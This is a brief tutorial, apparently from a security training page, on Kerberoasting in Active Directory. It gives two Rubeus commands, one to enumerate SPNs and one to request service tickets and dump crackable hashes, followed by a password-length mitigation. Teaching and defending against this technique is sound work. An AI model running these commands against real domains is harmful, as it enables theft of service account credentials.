Kerberoasting 101
Extracting Service Account Credentials via SPN tickets.
Overview
Kerberoasting is a post-exploitation technique that allows an attacker to request a Kerberos service ticket (TGS) for any service principal name (SPN) in the domain. The vulnerability lies in the fact that any authenticated user can request these tickets.
Attack Execution
1. Enumerate SPNs:
Rubeus.exe kerberoast /stats2. Request & Roast:
Rubeus.exe kerberoast /format:hashcat /outfile:hashes.txtMitigation
Ensure service accounts have complex, long passwords (25+ characters) to make offline cracking infeasible.